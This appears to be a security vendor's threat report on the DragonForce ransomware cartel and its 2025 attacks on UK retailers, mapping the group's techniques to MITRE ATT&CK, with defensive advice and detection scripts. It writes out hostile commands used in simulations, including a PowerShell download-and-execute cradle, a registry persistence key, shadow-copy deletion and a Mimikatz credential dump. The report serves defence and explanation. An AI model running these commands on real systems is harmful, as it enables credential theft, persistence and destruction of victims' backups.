Retail Under Fire: Inside the DragonForce Ransomware Attacks on Industry Giants
Who Is the DragonForce Ransomware Group?
DragonForce is a relatively new ransomware operation that emerged in late 2023 and quickly evolved into a Ransomware-as-a-Service (RaaS) “cartel”. Unlike single-group ransomware gangs, DragonForce recruits affiliate hackers and even other RaaS groups, offering them its ransomware platform under a white-label model. In other words, affiliates can carry out attacks using DragonForce’s infrastructure and encryptor while branding the attack as their own. DragonForce’s operators take a 20% cut of any ransom but handle the heavy lifting (malware development, leak site, payment negotiation) on their servers.
History and Motivation
The group’s presence was first noted in mid-2023, and by June 2024 it had launched a full affiliate program. Researchers report that DragonForce’s malware is built from the leaked source code of infamous ransomware like LockBit 3.0 and Conti, giving it a robust and tested foundation. The gang is purely financially motivated – a DragonForce representative told the press they are “here for business and money”.
Interestingly, they claim to follow a moral code: for example, they avoid certain healthcare targets (even professing empathy for cancer or cardiac patients). Whether this moral stance holds true is debatable, but it indicates DragonForce is not driven by political or ideological goals, unlike some hacktivists.
Recent Retail Attacks: DragonForce in Action?
Recent incidents in April–May 2025 suggest that DragonForce or its affiliates are actively targeting large UK retail chains in a worrying spree:
Marks & Spencer (M&S) Breach – Late April 2025
M&S, one of Britain’s largest department store chains, suffered a major cyberattack that caused widespread outages. The company had to pause all online clothing and home orders for about a week, as its website and app were disrupted. In stores, even contactless payment systems and other digital services (like click-and-collect) were impacted. Subsequent investigation revealed this was a ransomware attack.
Notably, security experts linked the M&S breach to affiliates of DragonForce – the attackers deployed the DragonForce ransomware encryptor on M&S’s network. Sources indicate the perpetrators were using techniques associated with the “Scattered Spider” group (a known affiliate crew), meaning they likely gained entry through social engineering and then leveraged DragonForce’s ransomware payload for the final encryption stage. The incident highlighted DragonForce’s ability to cripple a major retailer; M&S warehouse operations were halted and hundreds of staff were told to stay home while emergency response efforts were underway.
Co-op Group Breach – Late April 2025
Just days after the M&S attack, the Co-op Group (a large UK grocery and insurance retailer) disclosed that hackers had attempted to break into its systems [1]. Initially, Co-op characterized it as a contained incident with small impact on back-office and call center services. However, internal communications soon suggested a more serious breach. An email from Co-op’s CIO, later obtained by journalists, revealed that VPN access was suspended for all staff and employees were cautioned to be extremely vigilant on email and Microsoft Teams. The memo even advised employees hosting Teams meetings to verify all attendees on camera, implying concern that the attacker might have gained access to internal accounts or meetings. This aligns with the social engineering-heavy approach of DragonForce’s affiliates.
While Co-op has not publicly confirmed ransomware deployment, security experts noted that the incident fit the pattern of an early-stage attack that was caught in time [2]. Co-op’s swift action to shut down parts of its IT (essentially isolating systems) was praised as a proactive move to contain the threat, potentially preventing the hackers from escalating to the data theft or encryption phase.
Harrods Breach – Early May 2025
Harrods, the luxury London department store, publicly confirmed the cyberattack on Thursday, May 1, 2025. This made Harrods the third high-profile UK retailer, right after Marks & Spencer and the Co-op, to report such an incident within a two-week span [3].
In response, Harrods’ IT security team restricted all internet access at its stores and facilities as a precaution on the day the breach was detected. Fortunately, Harrods stated that its stores remained operational and customers could shop online, indicating the attack was contained before causing major disruption.
At this time, there is no official confirmation that DragonForce was behind the Harrods attack. It appears to be an attempted intrusion caught early, and Harrods has not mentioned ransomware or data theft publicly. However, the timing and similarity to the other cases has raised speculation of a common culprit or campaign. We include the Harrods incident here because it underscores an emerging trend: organized cybercriminals are singling out big-name retail and department store chains. (I must emphasize that DragonForce’s involvement in the Harrods case is unconfirmed, unlike the clear DragonForce link in M&S.)
Analyzing DragonForce Ransomware's Advanced Tactics, Techniques, and Procedures (TTPs)
The following section outlines the confirmed TTPs used by DragonForce affiliates operating under its ransomware-as-a-service (RaaS) model.
Initial Access (TA0001) – Exploiting the VPN Gateway
Social Engineering & Phishing (T1566)
DragonForce affiliates frequently rely on human-targeted techniques for initial access, particularly credential theft through phishing emails and phone-based social engineering. These methods are designed to trick employees, especially IT help desks, into revealing credentials or granting access.
In the Marks & Spencer (M&S) and Co-op intrusions, it’s believed that initial access was gained through such tactics [4]. Security researchers suspect that Scattered Spider, a known DragonForce affiliate, was involved, pointing to the group’s typical use of phishing sites that mimic SSO portals, MFA push “bombing,” and SIM swapping [1]. These tactics aim to bypass authentication controls and exploit human trust, rather than technical vulnerabilities.
Valid Accounts (T1078)
A core feature of DragonForce intrusions is the use of legitimate accounts for access. The group capitalizes on any credentials they can steal or crack. In the M&S breach, for instance, the attackers quietly obtained the company’s Active Directory database (NTDS.dit) months before deploying ransomware [5]. This database contained password hashes for thousands of accounts, which the attackers likely cracked offline to retrieve plaintext passwords.
Armed with those credentials, including highly privileged domain admin accounts, the threat actors could log in as authorized users. Using valid accounts makes their activity blend in with normal network traffic and helps bypass security controls that only look for “outsider” threats.
Execution (TA0002) – Deploying Malware in Memory
PowerShell Scripts (T1059.001)
DragonForce often abuses PowerShell, Windows’ powerful command-line scripting language, to execute payloads and automate tasks. PowerShell is an attractive tool for attackers because it’s trusted and pre-installed on Windows.
In observed cases, the group ran malicious PowerShell commands to launch their malware and to disable security features. For example, a registry Run key used by DragonForce referenced a PowerShell command with -WindowStyle Hidden to silently execute a malicious script at startup [6]. By using PowerShell, they can download or execute malicious code directly in memory, helping them evade anti-virus detection.
(According to the DFIR analysis of security researchers, the downloaded binary was later identified as a Cobalt Strike beacon [7].)
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates and simulates the complete attack lifecycle of the DragonForce RaaS cartel, using up-to-date TTPs observed in the wild. In this step, the delivery phase is simulated by stealthily downloading a malicious executable to the compromised host, mirroring how DragonForce delivers its payloads in real-world attacks.
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('%remotefile-9776%')"
User Execution of Malware (T1204.002)
When social engineering is involved, DragonForce frequently relies on tricking a user into running a file. Phishing emails have delivered attachments or links that drop malware loaders onto the victim’s machine (such as a bogus document that runs a hidden macro or an executable disguised as a PDF). Persuading a user to execute a malicious file in this way is a form of user execution. Once run, that initial malware will typically call back to the attackers and pave the way for the main ransomware deployment.
In the case of DragonForce affiliates, they may use lightweight implants to establish a foothold before pulling down the full-featured tools like Cobalt Strike or the ransomware encryptor itself.
Persistence & Privilege Escalation
Registry Run Keys (T1547.001)
To maintain persistence on compromised machines, DragonForce has been seen creating or modifying Windows Registry “Run” keys. This ensures that their malware or a backdoor starts every time the system boots.
For instance, one DragonForce sample added a Run key under HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ named “socks5,” pointing to a hidden PowerShell execution command. This kind of autorun entry guarantees the attackers re-establish a foothold even after reboots.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates and simulates the complete attack lifecycle of the DragonForce RaaS cartel, using up-to-date TTPs observed in the wild. In this step, SCV simulates persistence by adding a registry key that ensures a malicious executable runs once at the next system startup:
reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "socks5" /t REG_SZ /d "%TMP%\socks aug\socks.exe" /f
Scheduled Tasks (T1053.005)
Another persistence trick is creating scheduled tasks. DragonForce actors have created tasks in Windows that execute malicious programs on a set schedule or at system startup. Using built-in utilities like schtasks.exe or the older at command, they schedule their malware to run periodically or when a user logs in. Scheduled tasks are useful for both persistence and for executing post-compromise actions (like running a script every hour).
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates the full attack lifecycle of DragonForce RaaS affiliates by replicating current TTPs observed in the wild. In this step, SCV simulates the use of scheduled tasks—a common persistence technique used by ransomware operators.
Play Processes, Process 1
This simulates the creation or execution of a scheduled task via PowerShell, reflecting how DragonForce may automate payload execution across reboots or at specific intervals.
Rewind Processes, Process 1
This step cleans up the simulated task, ensuring a safe and controlled validation cycle. By reproducing this behavior, SCV helps organizations verify whether endpoint defenses and logging tools can detect unauthorized task creation and abuse of scheduler components.
New Services (T1543.003)
In some intrusions, the attackers install a malicious Windows service for their payload. By running as a service (often configured to start automatically), the malware gains persistent system-level privileges. Creating a service can also elevate privileges if done from an admin account, since the service will run as LOCAL SYSTEM. DragonForce has leveraged this to ensure their ransomware or tooling has the highest level of access on infected endpoints.
Abuse of Valid Accounts – Domain Persistence (T1078.002)
Stealing domain credentials not only helps with initial access, but also with persistence enterprise-wide. DragonForce is known to “ride” the legitimate accounts they compromise for an extended period. By maintaining access to a compromised Active Directory account (or creating new accounts/backdoors in AD), the attackers can return even if one machine is cleaned.
In M&S’s case, having domain admin credentials meant the attackers could pivot to any system at will. Even if one backdoor was discovered, they had multiple other accounts to use as insurance. This highlights why evicting DragonForce requires a thorough credential reset and audit across the domain.
(Privileged escalation techniques often overlap with persistence in DragonForce operations, since using stolen admin accounts or services inherently gives elevated privileges. Additionally, security researchers have noted that DragonForce’s malware can leverage access token manipulation – calling Windows APIs like DuplicateTokenEx() and CreateProcessWithTokenW() – to assume the rights of more privileged users on a system [7].)
Defense Evasion
Disable Security Tools (T1562.001)
DragonForce affiliates employ aggressive methods to impair or disable defense mechanisms. A notable technique is “Bring Your Own Vulnerable Driver” (BYOVD) – they deploy a legitimate but vulnerable kernel driver to the target system and exploit it to turn off security software.
For example, the group has been observed loading the RogueKiller Anti-Rootkit Driver, a benign tool that can terminate processes, and then abusing it to kill anti-virus/EDR processes that protect the system. By using a signed driver with known flaws, they essentially gain kernel-level privileges to neutralize security products. This allows their ransomware and tools to run uninhibited. DragonForce’s use of this BYOVD tactic to disable monitoring agents and antivirus has been explicitly reported.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates and simulates the complete attack lifecycle of the DragonForce RaaS cartel, using up-to-date TTPs observed in the wild. Two processes are run to mimic the behavior of disarming the defensive mechanisms. Note that each process is also accompanied by a rewind process so that the validation remains safe.
Clear Event Logs (T1070.001)
After doing their damage, DragonForce actors attempt to cover their tracks. One common step is deleting system event logs to erase evidence of their activities.
For instance, they execute commands like wevtutil cl System and use WMI (wmic.exe shadowcopy delete) to remove Windows Shadow Copy events and other logs. By wiping logs, they impede forensic investigators from piecing together what happened.
In the M&S incident, it was noted that the attackers “deleted Windows Event Logs to impede forensic investigations”. This is a typical ransomware play to delay detection and response.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates and simulates the complete attack lifecycle of the DragonForce RaaS cartel, using up-to-date TTPs observed in the wild. In this step, SCV simulates the impact phase by executing PowerShell and Bash commands to delete Windows shadow copies and delete logs, respectively.
powershell.exe -c "Get-CimInstance Win32_ShadowCopy | Remove-CimInstance"
Obfuscation & Anti-Analysis
The DragonForce encryptor contains code inherited from Conti that implements anti-analysis tricks. This includes packing or encrypting the ransomware binary to avoid signature detection, as well as checking for sandbox or virtualized environments to evade malware analysts. While specifics are not always public, the use of Conti’s leaked codebase means DragonForce likely benefits from Conti’s sophisticated evasion techniques (such as dynamic API imports and junk code insertion to confuse analysts). All these measures make it harder for defenders to detect and study the malware in action.
Credential Access
Credential Dumping (T1003.001 – LSASS Memory)
Once inside a network, DragonForce attackers aggressively harvest credentials. A primary technique is dumping credentials from memory, specifically from the LSASS process which stores Windows login secrets. The group leverages tools like Mimikatz to extract credentials (passwords, password hashes, Kerberos tickets) from LSASS. They may use procdump or task manager exploits to dump LSASS memory and then run Mimikatz on it offline.
Capturing credentials in this way allows the attackers to obtain domain administrator privileges and lateral movement opportunities rapidly. In past cases, they have pulled complete credential databases (e.g. the NTDS.dit file mentioned earlier), and also grabbed local administrator passwords from servers. By the time they’re ready to deploy ransomware, the attackers often have keys to the kingdom – all the accounts they need to administer and encrypt vast portions of the network.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates and simulates the complete attack lifecycle of the DragonForce RaaS cartel, using up-to-date TTPs observed in the wild. In this step, SCV simulates credential dumping, one of DragonForce's key post-exploitation techniques, by executing Mimikatz to extract cleartext passwords from memory:
%TMP%\mimikatz22020220919x64.exe "privilege::debug" "sekurlsa::logonPasswords" exit
This mirrors how DragonForce affiliates access credentials from LSASS to escalate privileges and facilitate lateral movement across the network.
Discovery
Network and Host Discovery (T1016, T1082)
DragonForce intruders spend time mapping out the victim’s IT environment. They run commands to discover network configurations (IP addresses, routes) and gather system information on each host (OS version, hostname, logged-in users). This reconnaissance helps them identify critical servers and plan the ransomware deployment. For instance, they might use ipconfig/ifconfig to get network info and systeminfo or WMI queries to enumerate host details.
Active Directory Querying (T1482 – Domain Trust Discovery)
The group heavily enumerates Active Directory. AdFind, a free AD query tool, is part of their toolkit. With AdFind, DragonForce operators can extract details on domain trusts, organizational units, user accounts, group memberships, and more. This tells them how the domain is structured and where high-value targets (like additional domain controllers, file servers, etc.) reside. In effect, they map trust relationships between different domain or forest segments, which can reveal if there are routes to further compromise parent or child domains.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates the complete attack lifecycle of DragonForce RaaS affiliates by replicating their latest TTPs observed in active campaigns. In this phase, SCV simulates domain trust discovery, an essential reconnaissance step, by executing adfind.bat via command line.
This mirrors how DragonForce operators use tools like AdFind to query Active Directory and map relationships between domains, users, and groups.
Network Scanning (T1046)
To identify other systems to move into, DragonForce uses port scanning tools. One known tool is SoftPerfect Network Scanner – a utility that pings hosts and enumerates open ports and shared folders on the network. The attackers run such scanners to find systems running services like SMB (file shares), SQL databases, RDP, etc. For example, they might scan the network to locate all reachable servers and specifically look for backup servers or VMware ESXi hosts. In fact, the group explicitly targets VMware infrastructure, so discovering the IPs of ESXi/vCenter servers is a key reconnaissance goal.
File/Directory Discovery (T1083)
DragonForce affiliates also manually search through file shares and directories for sensitive data. Before triggering ransomware, they often spend days quietly collecting files (customer data, financial records, databases) to exfiltrate. They use commands like dir /s or PowerShell scripts to list files on network shares. Anything that looks important (e.g. large SQL backups, documents with keywords like “confidential” or “passwords”) can be flagged for exfiltration. By the time they launch the encryption, they have already identified and stolen the crown jewels of the data – maximizing their leverage over the victim.
Lateral Movement
Remote Desktop Protocol (T1021.001)
DragonForce’s go-to method for moving laterally within a network is abusing RDP. With the plethora of credentials they gather, attackers will use RDP to hop onto other systems interactively. For instance, they might take an admin account and RDP from a compromised workstation into a file server, then from there into a domain controller, and so on. RDP provides a graphical interface, which the attackers can use to manually deploy tools or ransomware on each target system. It’s been reported that DragonForce actors specifically abused RDP for internal traversal, using it to access servers and pivot deeper. They also sometimes enable RDP on systems where it was off or create new RDP sessions by adding a user to the “Remote Desktop Users” group via their domain admin privileges.
SMB/Windows Admin Shares (T1021.002)
In addition to RDP, the attackers may use SMB (Windows file sharing) to move laterally. With credentials in hand, they can connect to administrative shares (like \\HOST\C$) on remote machines to drop and execute binaries.
For example, using tools like Cobalt Strike (see below) or built-in psexec functionality, they push the ransomware executable to multiple machines and trigger it remotely. While specific reporting highlights RDP, it is likely DragonForce affiliates use a mix of methods – anything from WMI calls (wmic /node:TARGET process call create ...) to copying files over SMB – to propagate across systems. The goal is to fan out across as many servers and endpoints as possible prior to detonation of the ransomware, so no critical device is left untouched.
Command and Control
C2 over Web Protocols (T1071.001)
To coordinate their attack, DragonForce attackers install backdoors or agents that communicate with their command-and-control (C2) servers. They often use Cobalt Strike Beacon, a sophisticated post-exploitation agent, to maintain real-time control within the network. Cobalt Strike beacons typically communicate over HTTP/HTTPS (web protocols) to blend in with normal traffic. DragonForce’s C2 traffic thus often hides in plain sight as web browsing or API calls. Using application-layer protocols not only evades some network filters, it also allows the attackers to control implants from afar – issuing commands to dump credentials, move files, or execute programs. In addition, malware like SystemBC (a SOCKS5 proxy implant) has been used, which gives the attackers a stealthy network tunnel out of the victim's environment. This combination of C2 tools ensures that even if one access point is detected, others persist.
(Because DragonForce enables affiliates to customize ransomware builds, some affiliates might use their own C2 frameworks. However, the use of widely available tools like Cobalt Strike is commonly reported. The reliance on encrypted web traffic for C2 makes detection challenging without deep packet inspection or anomaly detection on network traffic.)
Exfiltration & Impact
Data Exfiltration (Multiple Techniques)
Prior to encryption, DragonForce operators exfiltrate large amounts of data from the victim network. They have been known to use both their C2 channels and separate file transfer tools to accomplish this. In some cases, attackers compress sensitive data into archives and use cloud services or anonymous FTP to upload the haul. Others may utilize command-line tools (e.g. Rclone or wget) to send data to attacker-controlled servers. The exact techniques vary, but the outcome is the same – gigabytes or terabytes of confidential data are smuggled out. According to threat intelligence, DragonForce advertises stolen data on its leak site, and if the victim doesn’t pay, the data is published for all to see. A Resecurity report on a February 2025 attack noted that DragonForce leaked over 6 TB of data from a Middle Eastern victim when the ransom demand wasn’t met. This underscores the scale of exfiltration they are capable of.
File Encryption for Impact (T1486)
The final and most destructive phase is ransomware deployment. DragonForce’s malware (often referred to as the DragonForce encryptor) is unleashed across the network to encrypt files and render systems inoperable. Notably, DragonForce targets not just Windows machines but also Linux and VMware systems. They have developed ransomware binaries for ESXi (VMware’s hypervisor); in the M&S attack, the gang deployed the DragonForce encryptor to VMware ESXi hosts to encrypt entire virtual servers. This tactic of hitting virtualization infrastructure can cripple dozens of servers in one blow. The ransomware uses robust encryption (often combining RSA and AES) to lock files, and it can encrypt a wide range of targets including NAS storage, databases, and backups. The impact on the victim organization is immediate: business operations halt as critical data and services become unavailable. M&S, for example, had to pause all online orders and even in-store digital services for days due to the encryption event.
How Does Picus Simulate This?
Picus Security Control Validation (SCV) emulates the complete attack lifecycle of DragonForce RaaS affiliates by replicating the latest TTPs observed in active campaigns. In this phase, SCV simulates the impact stage by mimicking the ransomware encryption process using a harmless dummy file.
Encrypting a Dummy File with ChaCha8 for DragonForce Ransomware - Process 1
This command encrypts a test file using the ChaCha8 algorithm, reflecting DragonForce’s use of custom encryption routines during real-world attacks. The simulation allows organizations to evaluate how well their defenses detect and respond to file encryption activity, without the risks of running actual ransomware.
Note that a common step in real-world intrusions is the display of a ransom note, used to communicate demands and payment instructions to the victim.
To replicate this behavior, SCV simulates the ransom note display by opening a dummy text file (it also has rewind action process):
notepad.exe "%TMP%\readme.txt"
This step mimics how ransomware often drops and launches a ransom note to ensure user visibility. It allows organizations to validate whether such file access and execution events are properly logged and monitored by endpoint security tools.
Inhibiting System Recovery (T1490)
To ensure the maximum impact, DragonForce takes steps to prevent victims from easily recovering their data. This includes deleting backup files and snapshots. The ransomware or attackers will delete Volume Shadow Copies on Windows systems using commands via WMI or vssadmin. They also seek out backup servers or connected NAS devices and encrypt or erase those as well. By scrubbing backups, they remove the victim’s safety net and put them in a position where paying the ransom might be the only way to recover quickly. As one security expert noted, ransomware gangs (DragonForce included) are increasingly turning to data exfiltration and destruction of backups to increase their leverage – a trend clearly seen in DragonForce’s modus operandi.
How Does Picus Help Defend Against the DragonForce Ransomware Group?
We strongly suggest simulating ransomware groups to test the effectiveness of your security controls against their attacks using the Picus Security Validation Platform.
The Picus Threat Library includes the following DragonForce threat, replicating TTPs observed in the wild.
Threat ID | Threat Name | Attack Module
81422 | DragonForce Ransomware Campaign | Windows Endpoint
22466 | DragonForce Ransomware Email Threat | Email Infiltration
25764 | DragonForce Ransomware Download Threat | Network Infiltration
The Picus Mitigation Library also provides the following mitigation suggestions regarding the DragonForce threat.
Security Control | Signature ID | Signature Name
Check Point NGFW | 08403A068 | Cryptominer.Win32.Cryptominer.TC.61a6GtVx
Check Point NGFW | 083324DCA | Generic.Win32.Generic.TC.e472JFkr
Check Point NGFW | 0D5383CA0 | UDS:Trojan-Ransom.Win32.Generic.TC.ce5aQFyH
Check Point NGFW | 0EB4D21EB | UDS:Trojan-Ransom.Win32.Generic.TC.c435JsqV
Check Point NGFW | 091DA1757 | Generic.Win32.Generic.TC.f590BaOd
Fortinet FortiGate NGFW | 8273597 | W32/Conti.F!tr.ransom
Fortinet FortiGate NGFW | 8049505 | W32/CryptoMiner.L!tr
Fortinet FortiGate NGFW | 10173180 | W32/Conwise.RCE!tr
Fortinet FortiGate NGFW | 10202916 | W32/Filecoder.OQR!tr.ransom
Palo Alto Networks NGFW | 58330017 | Trojan/Win32.co.gr
Palo Alto Networks NGFW | 635486721 | Ransom/Win32.lockbit.auy
Palo Alto Networks NGFW | 697522821 | Ransom/Win32.conti.jv
Palo Alto Networks NGFW | 654915060 | Ransom/Win32.conti.jf
Cisco Secure Firewall | Win.Worm.Coinminer::1201 |
Cisco Secure Firewall | Auto.B9BBA0.281457.in02 |
Cisco Secure Firewall | Auto.BA1BE9.281550.in02 |
Cisco Secure Firewall | MalwareX:Attribute.28cn.in14.Talos |
Trellix IPS | 0x4840c900 | MALWARE: Malicious File Detected by GTI
Defense Strategies Against the DragonForce Ransomware Group's Attacks
Given DragonForce’s tactics, organizations, especially those in retail and critical infrastructure, should adopt a multi-layered defense. Below are five tailored mitigation and remediation steps to counter DragonForce’s known behaviors:
Bolster Authentication and User Awareness
Since DragonForce frequently gains entry through social engineering, implement phishing-resistant multi-factor authentication across all user accounts. Favor methods like FIDO2 security keys or authenticator apps over SMS-based 2FA to thwart SIM swap and MFA fatigue attacks. Educate employees (including IT helpdesk staff) about DragonForce’s social tricks – for example, train staff to recognize fake login pages and to report unusual MFA prompts or suspicious calls claiming to be IT support. Regular phishing simulation exercises and clear policies (e.g. IT will never ask for your password on the phone) can reduce the human attack surface.
Lock Down Remote Access Points
Audit and secure any externally accessible services such as VPNs, RDP servers, and cloud admin portals. Enforce strict MFA on these services and consider placing them behind a VPN or ZTNA (Zero Trust Network Access) gateway rather than exposing them directly. DragonForce has been known to use valid credentials to log in via RDP/VPN, so ensure that default accounts are disabled and use strong, unique passwords for all accounts (with account lockout policies to deter brute force). Regularly scan for and close RDP ports or other remote admin interfaces open to the internet. Where possible, require VPN or jump-server usage for RDP so that direct RDP access to critical servers is not possible. These steps make it far harder for the attackers to exploit stolen creds or open ports as an initial foothold.
Protect Active Directory and Privileged Accounts
DragonForce’s campaign highlights the importance of safeguarding credentials. Implement measures to detect and prevent credential dumping – for instance, enable Credential Guard or LSASS memory protection on Windows endpoints to make dumping harder. Use tools that can detect Mimikatz or abnormal process access to LSASS (many EDR solutions have signatures or behavior rules for this). Monitor your domain controllers for suspicious behavior, such as unexpected retrieval of the NTDS.dit file or use of DCSync functions (which mimic domain controller replication to steal creds). Routine password changes for service accounts and privileged users can limit the value of any stolen hashes. Additionally, practice the principle of least privilege: tighten who has Domain Admin rights and use tiered administration (separate accounts for admin tasks vs. everyday use). In the event of a suspected breach, immediately invalidate or change all AD enterprise admin credentials, since DragonForce will almost certainly target those.
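The “abnormal process access to LSASS” check suggested above, as an added example that is not Picus’s or DragonForce’s code: it classifies Sysmon ProcessAccess (Event ID 10) records by the access-rights mask granted on lsass.exe, the same access Mimikatz and procdump need for the credential dumping described in the Credential Access section. The sample events and the ALLOWED_SOURCES list are constructed assumptions.

```python
"""Flag suspicious handle opens against lsass.exe from Sysmon Event ID 10 data.

Added example (not Picus or DragonForce code). Events are dicts using Sysmon's
ProcessAccess field names; the samples below are constructed for the example.
"""

# Windows process access rights that matter for memory dumping.
PROCESS_VM_READ = 0x0010            # read LSASS memory (minimum for sekurlsa)
PROCESS_VM_WRITE = 0x0020           # write LSASS memory (patching, injection)
PROCESS_ALL_ACCESS = 0x1FFFFF       # full access, typical of procdump-style dumps

# Images that legitimately read LSASS memory on many estates (AV/EDR agents,
# WMI). Assumed list for this example: build it from observed baseline data.
ALLOWED_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
    r"c:\windows\system32\csrss.exe",
}


def is_lsass(path):
    """True when the target image is the LSASS process."""
    return path.lower().endswith(r"\lsass.exe")


def classify_lsass_access(event):
    """Return 'high', 'medium' or None for one ProcessAccess event.

    high:   full access or VM_WRITE on LSASS from a non-allow-listed image
    medium: VM_READ on LSASS from a non-allow-listed image
    None:   other targets, allow-listed sources, or masks without memory read
    """
    if not is_lsass(event.get("TargetImage", "")):
        return None
    source = event.get("SourceImage", "").lower()
    if source in ALLOWED_SOURCES:
        return None
    access = int(event["GrantedAccess"], 16)   # Sysmon logs the mask as hex text
    if access == PROCESS_ALL_ACCESS or access & PROCESS_VM_WRITE:
        return "high"
    if access & PROCESS_VM_READ:
        return "medium"
    return None


def triage(events):
    """Return alerts as (computer, source image, granted access, severity)."""
    alerts = []
    for ev in events:
        severity = classify_lsass_access(ev)
        if severity:
            alerts.append((ev["Computer"], ev["SourceImage"], ev["GrantedAccess"], severity))
    return alerts


# Constructed sample events: two dump attempts, one AV engine, two benign opens.
SAMPLE_EVENTS = [
    {"Computer": "SRV02", "SourceImage": r"C:\Users\Public\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"Computer": "SRV02", "SourceImage": r"C:\Tools\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"Computer": "WS01", "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"Computer": "WS01", "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1010"},
    {"Computer": "WS01", "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Credential Guard does not stop the handle open itself, so this telemetry stays useful even on hardened endpoints; tune the allow-list per estate rather than by vendor name alone.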
Endpoint Hardening and Monitoring
Deploy advanced Endpoint Detection & Response (EDR) tools and ensure they are configured in tamper-resistant mode. DragonForce actors will try to disable your security – including using BYOVD techniques to kill agents – so consider enabling features like Microsoft’s Driver Blocklist or Hypervisor-Protected Code Integrity (HVCI) to prevent unauthorized drivers from running at the kernel level.
Maintain an updated list of known vulnerable drivers (like the one they abused) and use OS controls or third-party software to block them. Configure your EDR/SIEM to alert on behaviors indicative of DragonForce tools: e.g., a sudden invocation of schtasks.exe creating weirdly named jobs, the presence of AdFind queries in command-line logs, or any process launching wmic.exe shadowcopy delete (often a sign of ransomware prepping). Network monitoring is also key – look for C2 traffic patterns such as unusual outbound HTTP/S connections (Beacon traffic) or large data transfers to unfamiliar external hosts (potential exfiltration). Early detection of these indicators can enable you to contain the attack before ransomware detonation.
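The command-line indicators listed above can be checked with a small rule set like the following added example (not code from the original post or any vendor product). The process-creation field names and the sample events are assumptions constructed for the demo, and the task-name heuristic is a starting point to tune against your own telemetry.

```python
import re
import shlex

# Added example, not from the original post: rules over process-creation events
# (Sysmon event 1 style "Image"/"CommandLine" fields, assumed) for the indicators
# named above. The sample events at the bottom are constructed for the demo.

def task_name(cmd: str):
    """Return the /tn value from a schtasks command line, or None."""
    try:
        parts = shlex.split(cmd, posix=False)   # keep Windows backslashes intact
    except ValueError:                          # unbalanced quotes
        parts = cmd.split()
    for i, p in enumerate(parts[:-1]):
        if p.lower() == "/tn":
            return parts[i + 1].strip('"')
    return None
def looks_random(name: str) -> bool:
    """Heuristic for generated task names: one alphanumeric token (8+ chars) with
    digits embedded between letters, or a run of four or more consonants."""
    if not re.fullmatch(r"[A-Za-z0-9]{8,}", name):
        return False
    return bool(re.search(r"[A-Za-z]\d+[A-Za-z]", name)
                or re.search(r"[b-df-hj-np-tv-z]{4,}", name, re.IGNORECASE))
def classify(event: dict) -> list:
    """Return the indicator labels that match one process-creation event."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    low = " ".join(cmd.lower().split())         # normalise spacing and case
    hits = []
    if image == "schtasks.exe" and "/create" in low:
        name = task_name(cmd)
        if name and looks_random(name):
            hits.append("suspicious_schtasks_name")
    if image == "adfind.exe" or re.search(r"\badfind(\.exe)?\b", low):
        hits.append("adfind_discovery")
    if image == "wmic.exe" and "shadowcopy" in low and "delete" in low:
        hits.append("shadowcopy_delete")
    return hits
def scan(events: list) -> list:
    """Pair each flagged event with its indicator labels."""
    return [(e, h) for e in events if (h := classify(e))]
SAMPLE_EVENTS = [  # constructed
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /tn "x7Kq92Lp" /tr C:\Users\Public\upd.exe /sc onlogon'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /tn "DailyBackup01" /tr C:\Scripts\backup.cmd /sc daily'},
    {"Image": r"C:\Temp\AdFind.exe", "CommandLine": r'AdFind.exe -f "(objectcategory=computer)" -csv'},
    {"Image": r"C:\Windows\System32\wbem\wmic.exe", "CommandLine": "wmic.exe  shadowcopy  delete"},
    {"Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
]
```

Running `scan(SAMPLE_EVENTS)` returns the three flagged records with their labels; feed it the process-creation events from your EDR or SIEM export instead of the constructed list.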
Segment, Backup, and Prepare for Recovery
Given the possibility of widespread encryption, limit the blast radius through network segmentation. Isolate critical servers (e.g., domain controllers, database servers, VMware ESXi hosts) on separate VLANs with tightly controlled access. This can slow an intruder’s lateral movement and give defenders more time to notice and react. Equally important, maintain regular offline backups of key systems and data. DragonForce will try to delete on-site backups and Volume Shadow Copies, so ensure you have offsite or immutable backups that cannot be reached from the primary network. Test your backups and your restore procedures periodically – a backup is only as good as your ability to actually restore it under pressure.
In parallel, have an incident response plan that specifically covers ransomware scenarios. Conduct drills that include rapidly disconnecting or isolating infected machines (as Co-op did to contain its incident) and practicing system rebuilds. Being prepared to quickly rebuild servers or revert to clean snapshots can drastically reduce downtime. Remember that DragonForce also steals data, so include plans for data breach response: know how you will assess what was taken and how you’ll communicate with customers/regulators if leaks occur. As one cybersecurity expert advised in light of the M&S and Co-op attacks, other retailers should “take stock and learn” from these incidents – advance preparation is crucial because modern ransomware groups will use every trick (encryption, exfiltration, extortion) to pressure victims.
Continuously Test and Validate Security Controls
